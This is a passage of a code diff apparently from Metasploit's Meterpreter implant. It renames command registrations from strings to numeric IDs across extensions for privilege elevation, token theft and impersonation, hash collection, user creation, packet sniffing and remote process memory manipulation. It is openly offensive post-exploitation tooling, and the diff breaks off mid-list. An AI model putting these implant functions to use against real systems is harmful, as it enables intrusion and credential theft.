   tlv = tlv_pack(TLV_TYPE_ELEVATE_TECHNIQUE, 1)
   tlv += tlv_pack(TLV_TYPE_ELEVATE_SERVICE_NAME, rnd_string(5))
-  resp = invoke_meterpreter('priv_elevate_getsystem', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM, True, tlv)
   if resp == None:
     return False
 
   return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
 
 def rev2self():
-  resp = invoke_meterpreter('stdapi_sys_config_rev2self', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF, True)
   if resp == None:
     return False
 
@@ -22,14 +23,14 @@ def rev2self():
 
 def steal_token(pid):
   tlv = tlv_pack(TLV_TYPE_PID, pid)
-  resp = invoke_meterpreter('stdapi_sys_config_steal_token', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN, True, tlv)
   if resp == None:
     return False
 
   return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
 
 def drop_token():
-  resp = invoke_meterpreter('stdapi_sys_config_drop_token', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN, True)
   if resp == None:
     return False
 

c/meterpreter/source/extensions/python/Lib/meterpreter/extapi/adsi.py

@@ -1,26 +1,8 @@
 import meterpreter_bindings
 
 from meterpreter.core import *
-
+from meterpreter.tlv import *
-TLV_EXTAPI_EXTENSION = 20000
+from meterpreter.command import *
-
-TLV_TYPE_EXTAPI_ADSI_DOMAIN       = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 54)
-TLV_TYPE_EXTAPI_ADSI_FILTER       = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 55)
-TLV_TYPE_EXTAPI_ADSI_FIELD        = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 56)
-TLV_TYPE_EXTAPI_ADSI_RESULT       = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 57)
-TLV_TYPE_EXTAPI_ADSI_MAXRESULTS   = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 58)
-TLV_TYPE_EXTAPI_ADSI_PAGESIZE     = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 59)
-TLV_TYPE_EXTAPI_ADSI_ARRAY        = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 60)
-TLV_TYPE_EXTAPI_ADSI_STRING       = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 61)
-TLV_TYPE_EXTAPI_ADSI_NUMBER       = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 62)
-TLV_TYPE_EXTAPI_ADSI_BIGNUMBER    = TLV_META_TYPE_QWORD   | (TLV_EXTAPI_EXTENSION + 63)
-TLV_TYPE_EXTAPI_ADSI_BOOL         = TLV_META_TYPE_BOOL    | (TLV_EXTAPI_EXTENSION + 64)
-TLV_TYPE_EXTAPI_ADSI_RAW          = TLV_META_TYPE_RAW     | (TLV_EXTAPI_EXTENSION + 65)
-TLV_TYPE_EXTAPI_ADSI_PATH         = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 66)
-TLV_TYPE_EXTAPI_ADSI_PATH_VOL     = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 67)
-TLV_TYPE_EXTAPI_ADSI_PATH_PATH    = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 68)
-TLV_TYPE_EXTAPI_ADSI_PATH_TYPE    = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 69)
-TLV_TYPE_EXTAPI_ADSI_DN           = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 70)
 
 def enum_dcs(domain_name, max_results = None, page_size = None):
   query_filter = '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
@@ -60,7 +42,7 @@ def domain_query(domain_name, query_filter, fields, max_results = None, page_siz
   for f in fields:
     tlv += tlv_pack(TLV_TYPE_EXTAPI_ADSI_FIELD, f)
 
-  resp = invoke_meterpreter('extapi_adsi_domain_query', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY, True, tlv)
   if resp == None:
     return None
 

c/meterpreter/source/extensions/python/Lib/meterpreter/fs.py

@@ -2,9 +2,10 @@ import meterpreter_bindings
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 def show_mount():
-  resp = invoke_meterpreter('stdapi_fs_mount_show', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_FS_MOUNT_SHOW, True)
   if resp == None:
       return False
 

c/meterpreter/source/extensions/python/Lib/meterpreter/incognito.py

@@ -2,6 +2,7 @@ import meterpreter_bindings
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 INCOGNITO_NO_TOKENS = 'No tokens available\n'
 
@@ -13,7 +14,7 @@ def list_group_tokens():
 
 def __list_tokens_internal(order):
   tlv = tlv_pack(TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER, order)
-  resp = invoke_meterpreter('incognito_list_tokens', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_INCOGNITO_LIST_TOKENS, True, tlv)
 
   if resp == None:
     return None
@@ -30,7 +31,7 @@ def __list_tokens_internal(order):
 
 def impersonate(user):
   tlv = tlv_pack(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, user)
-  resp = invoke_meterpreter('incognito_impersonate_token', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN, True, tlv)
 
   if resp == None:
     return False
@@ -39,7 +40,7 @@ def impersonate(user):
 
 def snarf_hashes(server):
   tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
-  resp = invoke_meterpreter('incognito_snarf_hashes', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_INCOGNITO_SNARF_HASHES, True, tlv)
 
   if resp == None:
     return False
@@ -51,7 +52,7 @@ def add_user(server, username, password):
   tlv += tlv_pack(TLV_TYPE_INCOGNITO_USERNAME, username)
   tlv += tlv_pack(TLV_TYPE_INCOGNITO_PASSWORD, password)
 
-  resp = invoke_meterpreter('incognito_add_user', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_INCOGNITO_ADD_USER, True, tlv)
 
   if resp == None:
     return False
@@ -59,10 +60,10 @@ def add_user(server, username, password):
   return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
 
 def add_group_user(server, group, username):
-  return __add_group_user_internal('incognito_add_group_user', server, group, username)
+  return __add_group_user_internal(COMMAND_ID_INCOGNITO_ADD_GROUP_USER, server, group, username)
 
 def add_localgroup_user(server, group, username):
-  return __add_group_user_internal('incognito_add_localgroup_user', server, group, username)
+  return __add_group_user_internal(COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER, server, group, username)
 
 def __add_group_user_internal(msg, server, group, username):
   tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)

c/meterpreter/source/extensions/python/Lib/meterpreter/kiwi.py

@@ -3,6 +3,7 @@ import meterpreter.user
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 # OJ - 7th May 2018
 # This function was broken when we rejigged kiwi to work off the Mimikatz subrepo. Commenting this stuff
@@ -12,7 +13,7 @@ from meterpreter.tlv import *
 #    raise Exception('Unable to extract credentials: Not running as SYSTEM')
 #
 #  tlv = tlv_pack(TLV_TYPE_KIWI_PWD_ID, 0)
-#  resp = invoke_meterpreter('kiwi_scrape_passwords', True, tlv)
+#  resp = invoke_meterpreter(COMMAND_ID_KIWI_SCRAPE_PASSWORDS, True, tlv)
 #  if resp == None:
 #    return False
 #

c/meterpreter/source/extensions/python/Lib/meterpreter/sys.py

@@ -2,9 +2,10 @@ import meterpreter_bindings
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 def info():
-  resp = invoke_meterpreter('stdapi_sys_config_sysinfo', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO, True)
   if resp == None:
     return False
 
@@ -18,7 +19,7 @@ def info():
   }
 
 def ps_list():
-  resp = invoke_meterpreter('stdapi_sys_process_get_processes', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES, True)
   if resp == None:
       return False
 

c/meterpreter/source/extensions/python/Lib/meterpreter/tlv.py

@@ -1,9 +1,10 @@
 from meterpreter.core import *
 
-TLV_STDAPI_EXTENSION     = 0
+TLV_STDAPI_EXTENSION    = 0
-TLV_INCOGNITO_EXTENSION  = 20000
+TLV_INCOGNITO_EXTENSION = 20000
-TLV_PRIV_EXTENSION       = 20000
+TLV_PRIV_EXTENSION      = 20000
-TLV_KIWI_EXTENSION       = 20000
+TLV_KIWI_EXTENSION      = 20000
+TLV_EXTAPI_EXTENSION    = 20000
 
 # Stdapi constants
 TLV_TYPE_COMPUTER_NAME         = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1040)
@@ -57,3 +58,21 @@ TLV_TYPE_INCOGNITO_PASSWORD                    = TLV_META_TYPE_STRING  | (TLV_IN
 TLV_TYPE_INCOGNITO_SERVERNAME                  = TLV_META_TYPE_STRING  | (TLV_INCOGNITO_EXTENSION + 9)
 TLV_TYPE_INCOGNITO_GROUPNAME                   = TLV_META_TYPE_STRING  | (TLV_INCOGNITO_EXTENSION + 10)
 
+TLV_TYPE_EXTAPI_ADSI_DOMAIN       = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 54)
+TLV_TYPE_EXTAPI_ADSI_FILTER       = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 55)
+TLV_TYPE_EXTAPI_ADSI_FIELD        = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 56)
+TLV_TYPE_EXTAPI_ADSI_RESULT       = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 57)
+TLV_TYPE_EXTAPI_ADSI_MAXRESULTS   = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 58)
+TLV_TYPE_EXTAPI_ADSI_PAGESIZE     = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 59)
+TLV_TYPE_EXTAPI_ADSI_ARRAY        = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 60)
+TLV_TYPE_EXTAPI_ADSI_STRING       = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 61)
+TLV_TYPE_EXTAPI_ADSI_NUMBER       = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 62)
+TLV_TYPE_EXTAPI_ADSI_BIGNUMBER    = TLV_META_TYPE_QWORD   | (TLV_EXTAPI_EXTENSION + 63)
+TLV_TYPE_EXTAPI_ADSI_BOOL         = TLV_META_TYPE_BOOL    | (TLV_EXTAPI_EXTENSION + 64)
+TLV_TYPE_EXTAPI_ADSI_RAW          = TLV_META_TYPE_RAW     | (TLV_EXTAPI_EXTENSION + 65)
+TLV_TYPE_EXTAPI_ADSI_PATH         = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 66)
+TLV_TYPE_EXTAPI_ADSI_PATH_VOL     = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 67)
+TLV_TYPE_EXTAPI_ADSI_PATH_PATH    = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 68)
+TLV_TYPE_EXTAPI_ADSI_PATH_TYPE    = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 69)
+TLV_TYPE_EXTAPI_ADSI_DN           = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 70)
+

c/meterpreter/source/extensions/python/Lib/meterpreter/transport.py

@@ -3,9 +3,10 @@ import datetime
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 def list():
-  resp = invoke_meterpreter('core_transport_list', True)
+  resp = invoke_meterpreter(COMMAND_ID_CORE_TRANSPORT_LIST, True)
   if resp == None:
       return []
 
@@ -59,7 +60,7 @@ def add(url, session_expiry=None, comm_timeout=None, retry_total=None,
   if cert_hash:
     tlv += tlv_pack(TLV_TYPE_TRANS_CERT_HASH, cert_hash)
 
-  resp = invoke_meterpreter('core_transport_add', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_CORE_TRANSPORT_ADD, True, tlv)
   if resp == None:
     return False
 

c/meterpreter/source/extensions/python/Lib/meterpreter/user.py

@@ -2,18 +2,19 @@ import meterpreter_bindings
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 SYSTEM_SID = "S-1-5-18"
 
 def getuid():
-  resp = invoke_meterpreter('stdapi_sys_config_getuid', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_CONFIG_GETUID, True)
   if resp == None:
     return False
 
   return packet_get_tlv(resp, TLV_TYPE_USER_NAME)['value']
 
 def getsid():
-  resp = invoke_meterpreter('stdapi_sys_config_getsid', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_CONFIG_GETSID, True)
   if resp == None:
     return False
 

c/meterpreter/source/extensions/python/python_main.c

@@ -23,8 +23,8 @@ Remote* gRemote = NULL;
 /*! @brief List of commands that the extended API extension providers. */
 Command customCommands[] =
 {
-	COMMAND_REQ("python_reset", request_python_reset),
+	COMMAND_REQ(COMMAND_ID_PYTHON_RESET, request_python_reset),
-	COMMAND_REQ("python_execute", request_python_execute),
+	COMMAND_REQ(COMMAND_ID_PYTHON_EXECUTE, request_python_execute),
 	COMMAND_TERMINATOR
 };
 
@@ -55,11 +55,11 @@ BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
 
 /*!
  * @brief Callback for when a command has been added to the meterpreter instance.
- * @param commandName The name of the command that has been added.
+ * @param commandId The ID of the command that has been added.
  */
-VOID __declspec(dllexport) CommandAdded(const char* commandName)
+VOID __declspec(dllexport) CommandAdded(UINT commandId)
 {
-	binding_add_command(commandName);
+	binding_add_command(commandId);
 }
 
 /*!
@@ -98,28 +98,20 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
 
 	return ERROR_SUCCESS;
 }
-
-/*!
- * @brief Get the name of the extension.
- * @param buffer Pointer to the buffer to write the name to.
- * @param bufferSize Size of the \c buffer parameter.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-{
-	strncpy_s(buffer, bufferSize, "python", bufferSize - 1);
-	return ERROR_SUCCESS;
-}
 
 /*!
  * @brief Do a stageless initialisation of the extension.
+ * @param extensionId ID of the extension that the init was intended for.
  * @param buffer Pointer to the buffer that contains the init data.
  * @param bufferSize Size of the \c buffer parameter.
  * @return Indication of success or failure.
  */
-DWORD __declspec(dllexport) StagelessInit(const LPBYTE buffer, DWORD bufferSize)
+DWORD __declspec(dllexport) StagelessInit(UINT extensionId, const LPBYTE buffer, DWORD bufferSize)
 {
-	dprintf("[PYTHON] Executing stagless script:\n%s", (LPCSTR)buffer);
+    if (extensionId == EXTENSION_ID_PYTHON)
-	python_execute(NULL, (LPSTR)buffer, bufferSize, PY_CODE_TYPE_PY, NULL, NULL);
+    {
-	return ERROR_SUCCESS;
+        dprintf("[PSH] Executing stagless script:\n%s", (LPCSTR)buffer);
+		python_execute(NULL, (LPSTR)buffer, bufferSize, PY_CODE_TYPE_PY, NULL, NULL);
+    }
+    return ERROR_SUCCESS;
 }

c/meterpreter/source/extensions/python/python_meterpreter_binding.c

@@ -46,9 +46,19 @@ static PyObject* binding_invoke(PyObject* self, PyObject* args)
 	return result;
 }
 
-VOID binding_insert_command(const char* commandName)
+VOID binding_insert_command(UINT commandId)
 {
 	static PyMethodDef def;
+	char commandName[256] = { 0 };
+	if (commandId == 0)
+	{
+		strncpy_s(commandName, sizeof(commandName), "meterpreter_core", sizeof(commandName) - 1);
+	}
+	else
+	{
+		sprintf_s(commandName, sizeof(commandName), "command_%u", commandId);
+	}
+
 	dprintf("[PYTHON] inserting command %s", commandName);
 	def.ml_name = commandName;
 	def.ml_meth = binding_invoke;
@@ -67,15 +77,19 @@ VOID binding_startup()
 	}
 }
 
-VOID binding_add_command(const char* commandName)
+VOID binding_add_command(UINT commandId)
 {
-	dprintf("[PYTHON] Adding command %s", (char*)commandName);
+	dprintf("[PYTHON] Adding command %u", commandId);
 
-	// only add non-core commands
+	// We know that core commands are within the first thousand. So we can ignore anything that isn't
-	if (_strnicmp("core_", commandName, 5) != 0)
+	// big enough here to skip out on all the core commands. It's a cheat, but it works. And we cheat
+	// everywhere anyway!
+
+	// Only add non-core commands
+	if (commandId >= 1000)
 	{
-		met_api->list.add(gBoundCommandList, (char*)commandName);
+		met_api->list.add(gBoundCommandList, (LPVOID)(UINT_PTR)commandId);
-		binding_insert_command(commandName);
+		binding_insert_command(commandId);
 	}
 }
 
@@ -89,9 +103,9 @@ VOID binding_init()
 	// mechanisms for extension loading. Without this, we'd have to manually wire in each of the
 	// base commands, which doesn't make sense. Instead we can match against core command names
 	// and funnel through this binding knowing that they'll be there regardless of the wiring.
-	binding_insert_command("meterpreter_core");
+	binding_insert_command(0);
 	for (PNODE node = gBoundCommandList->start; node != NULL; node = node->next)
 	{
-		binding_insert_command((const char*)node->data);
+		binding_insert_command((UINT)(UINT_PTR)node->data);
 	}
 }

c/meterpreter/source/extensions/python/python_meterpreter_binding.h

@@ -3,6 +3,11 @@
  * @brief Declrations for functions that support meterpreter bindings.
  */
 
+#ifndef PYTHON_METERPRETER_BINDING_H
+#define PYTHON_METERPRETER_BINDING_H
+
 VOID binding_startup();
-VOID binding_add_command();
+VOID binding_add_command(UINT commandId);
-VOID binding_init();
+VOID binding_init();
+
+#endif

c/meterpreter/source/extensions/sniffer/sniffer.c

@@ -22,13 +22,13 @@ DWORD request_sniffer_capture_dump_read(Remote *remote, Packet *packet);
 /*! @brief List of custom commands provided by the sniffer extension. */
 Command customCommands[] =
 {
-	COMMAND_REQ("sniffer_interfaces", request_sniffer_interfaces),
+	COMMAND_REQ(COMMAND_ID_SNIFFER_INTERFACES, request_sniffer_interfaces),
-	COMMAND_REQ("sniffer_capture_start", request_sniffer_capture_start),
+	COMMAND_REQ(COMMAND_ID_SNIFFER_CAPTURE_START, request_sniffer_capture_start),
-	COMMAND_REQ("sniffer_capture_stop", request_sniffer_capture_stop),
+	COMMAND_REQ(COMMAND_ID_SNIFFER_CAPTURE_STOP, request_sniffer_capture_stop),
-	COMMAND_REQ("sniffer_capture_stats", request_sniffer_capture_stats),
+	COMMAND_REQ(COMMAND_ID_SNIFFER_CAPTURE_STATS, request_sniffer_capture_stats),
-	COMMAND_REQ("sniffer_capture_release", request_sniffer_capture_release),
+	COMMAND_REQ(COMMAND_ID_SNIFFER_CAPTURE_RELEASE, request_sniffer_capture_release),
-	COMMAND_REQ("sniffer_capture_dump", request_sniffer_capture_dump),
+	COMMAND_REQ(COMMAND_ID_SNIFFER_CAPTURE_DUMP, request_sniffer_capture_dump),
-	COMMAND_REQ("sniffer_capture_dump_read", request_sniffer_capture_dump_read),
+	COMMAND_REQ(COMMAND_ID_SNIFFER_CAPTURE_DUMP_READ, request_sniffer_capture_dump_read),
 	COMMAND_TERMINATOR
 };
 
@@ -796,15 +796,3 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
 	met_api->lock.destroy(snifferm);
 	return ERROR_SUCCESS;
 }
-
-/*!
- * @brief Get the name of the extension.
- * @param buffer Pointer to the buffer to write the name to.
- * @param bufferSize Size of the \c buffer parameter.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-{
-	strncpy_s(buffer, bufferSize, "sniffer", bufferSize - 1);
-	return ERROR_SUCCESS;
-}

c/meterpreter/source/extensions/stdapi/server/net/socket/tcp_server.c

@@ -246,7 +246,7 @@ DWORD tcp_channel_server_notify(Remote * remote, TcpServerContext * serverCtx)
 
 		dprintf("[TCP-SERVER] tcp_channel_server_notify. New connection %s:%d <- %s:%d", localhost, localport, peerhost, peerport);
 
-		request = met_api->packet.create(PACKET_TLV_TYPE_REQUEST, "tcp_channel_open");
+		request = met_api->packet.create(PACKET_TLV_TYPE_REQUEST, COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN);
 		if (!request)
 		{
 			BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. met_api->packet.create failed", ERROR_INVALID_HANDLE);

c/meterpreter/source/extensions/stdapi/server/stdapi.c

@@ -18,152 +18,151 @@ extern DWORD request_general_channel_open(Remote *remote, Packet *packet);
 Command customCommands[] =
 {
 	// General
-	COMMAND_REQ("core_channel_open", request_general_channel_open),
+	COMMAND_REQ(COMMAND_ID_CORE_CHANNEL_OPEN, request_general_channel_open),
 
 	// Railgun
-	COMMAND_REQ("stdapi_railgun_api", request_railgun_api),
+	COMMAND_REQ(COMMAND_ID_STDAPI_RAILGUN_API, request_railgun_api),
-	COMMAND_REQ("stdapi_railgun_api_multi", request_railgun_api_multi),
+	COMMAND_REQ(COMMAND_ID_STDAPI_RAILGUN_API_MULTI, request_railgun_api_multi),
-	COMMAND_REQ("stdapi_railgun_memread", request_railgun_memread),
+	COMMAND_REQ(COMMAND_ID_STDAPI_RAILGUN_MEMREAD, request_railgun_memread),
-	COMMAND_REQ("stdapi_railgun_memwrite", request_railgun_memwrite),
+	COMMAND_REQ(COMMAND_ID_STDAPI_RAILGUN_MEMWRITE, request_railgun_memwrite),
 
 	// Fs
-	COMMAND_REQ("stdapi_fs_ls", request_fs_ls),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_LS, request_fs_ls),
-	COMMAND_REQ("stdapi_fs_getwd", request_fs_getwd),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_GETWD, request_fs_getwd),
-	COMMAND_REQ("stdapi_fs_chdir", request_fs_chdir),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_CHDIR, request_fs_chdir),
-	COMMAND_REQ("stdapi_fs_mkdir", request_fs_mkdir),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_MKDIR, request_fs_mkdir),
-	COMMAND_REQ("stdapi_fs_delete_dir", request_fs_delete_dir),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_DELETE_DIR, request_fs_delete_dir),
-	COMMAND_REQ("stdapi_fs_delete_file", request_fs_delete_file),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_DELETE_FILE, request_fs_delete_file),
-	COMMAND_REQ("stdapi_fs_separator", request_fs_separator),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_SEPARATOR, request_fs_separator),
-	COMMAND_REQ("stdapi_fs_stat", request_fs_stat),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_STAT, request_fs_stat),
-	COMMAND_REQ("stdapi_fs_file_expand_path", request_fs_file_expand_path),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH, request_fs_file_expand_path),
-	COMMAND_REQ("stdapi_fs_file_move", request_fs_file_move),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_FILE_MOVE, request_fs_file_move),
-	COMMAND_REQ("stdapi_fs_file_copy", request_fs_file_copy),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_FILE_COPY, request_fs_file_copy),
-	COMMAND_REQ("stdapi_fs_md5", request_fs_md5),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_MD5, request_fs_md5),
-	COMMAND_REQ("stdapi_fs_sha1", request_fs_sha1),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_SHA1, request_fs_sha1),
-	COMMAND_REQ("stdapi_fs_search", request_fs_search),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_SEARCH, request_fs_search),
-	COMMAND_REQ("stdapi_fs_mount_show", request_fs_mount_show),
+	COMMAND_REQ(COMMAND_ID_STDAPI_FS_MOUNT_SHOW, request_fs_mount_show),
 
 	// Process
-	COMMAND_REQ("stdapi_sys_process_attach", request_sys_process_attach),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH, request_sys_process_attach),
-	COMMAND_REQ("stdapi_sys_process_close", request_sys_process_close),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE, request_sys_process_close),
-	COMMAND_REQ("stdapi_sys_process_execute", request_sys_process_execute),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE, request_sys_process_execute),
-	COMMAND_REQ("stdapi_sys_process_kill", request_sys_process_kill),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_KILL, request_sys_process_kill),
-	COMMAND_REQ("stdapi_sys_process_get_processes", request_sys_process_get_processes),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES, request_sys_process_get_processes),
-	COMMAND_REQ("stdapi_sys_process_getpid", request_sys_process_getpid),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_GETPID, request_sys_process_getpid),
-	COMMAND_REQ("stdapi_sys_process_get_info", request_sys_process_get_info),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO, request_sys_process_get_info),
-	COMMAND_REQ("stdapi_sys_process_wait", request_sys_process_wait),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_WAIT, request_sys_process_wait),
 
 	// Image
-	COMMAND_REQ("stdapi_sys_process_image_load", request_sys_process_image_load),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD, request_sys_process_image_load),
-	COMMAND_REQ("stdapi_sys_process_image_get_proc_address", request_sys_process_image_get_proc_address),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS, request_sys_process_image_get_proc_address),
-	COMMAND_REQ("stdapi_sys_process_image_unload", request_sys_process_image_unload),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD, request_sys_process_image_unload),
-	COMMAND_REQ("stdapi_sys_process_image_get_images", request_sys_process_image_get_images),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES, request_sys_process_image_get_images),
 
 	// Memory
-	COMMAND_REQ("stdapi_sys_process_memory_allocate", request_sys_process_memory_allocate),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE, request_sys_process_memory_allocate),
-	COMMAND_REQ("stdapi_sys_process_memory_free", request_sys_process_memory_free),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE, request_sys_process_memory_free),
-	COMMAND_REQ("stdapi_sys_process_memory_read", request_sys_process_memory_read),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ, request_sys_process_memory_read),
-	COMMAND_REQ("stdapi_sys_process_memory_write", request_sys_process_memory_write),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE, request_sys_process_memory_write),
-	COMMAND_REQ("stdapi_sys_process_memory_query", request_sys_process_memory_query),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY, request_sys_process_memory_query),
-	COMMAND_REQ("stdapi_sys_process_memory_protect", request_sys_process_memory_protect),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT, request_sys_process_memory_protect),
-	COMMAND_REQ("stdapi_sys_process_memory_lock", request_sys_process_memory_lock),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK, request_sys_process_memory_lock),
-	COMMAND_REQ("stdapi_sys_process_memory_unlock", request_sys_process_memory_unlock),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK, request_sys_process_memory_unlock),
 
 	// Thread
-	COMMAND_REQ("stdapi_sys_process_thread_open", request_sys_process_thread_open),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN, request_sys_process_thread_open),
-	COMMAND_REQ("stdapi_sys_process_thread_create", request_sys_process_thread_create),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE, request_sys_process_thread_create),
-	COMMAND_REQ("stdapi_sys_process_thread_close", request_sys_process_thread_close),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE, request_sys_process_thread_close),
-	COMMAND_REQ("stdapi_sys_process_thread_get_threads", request_sys_process_thread_get_threads),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS, request_sys_process_thread_get_threads),
-	COMMAND_REQ("stdapi_sys_process_thread_suspend", request_sys_process_thread_suspend),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND, request_sys_process_thread_suspend),
-	COMMAND_REQ("stdapi_sys_process_thread_resume", request_sys_process_thread_resume),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME, request_sys_process_thread_resume),
-	COMMAND_REQ("stdapi_sys_process_thread_terminate", request_sys_process_thread_terminate),
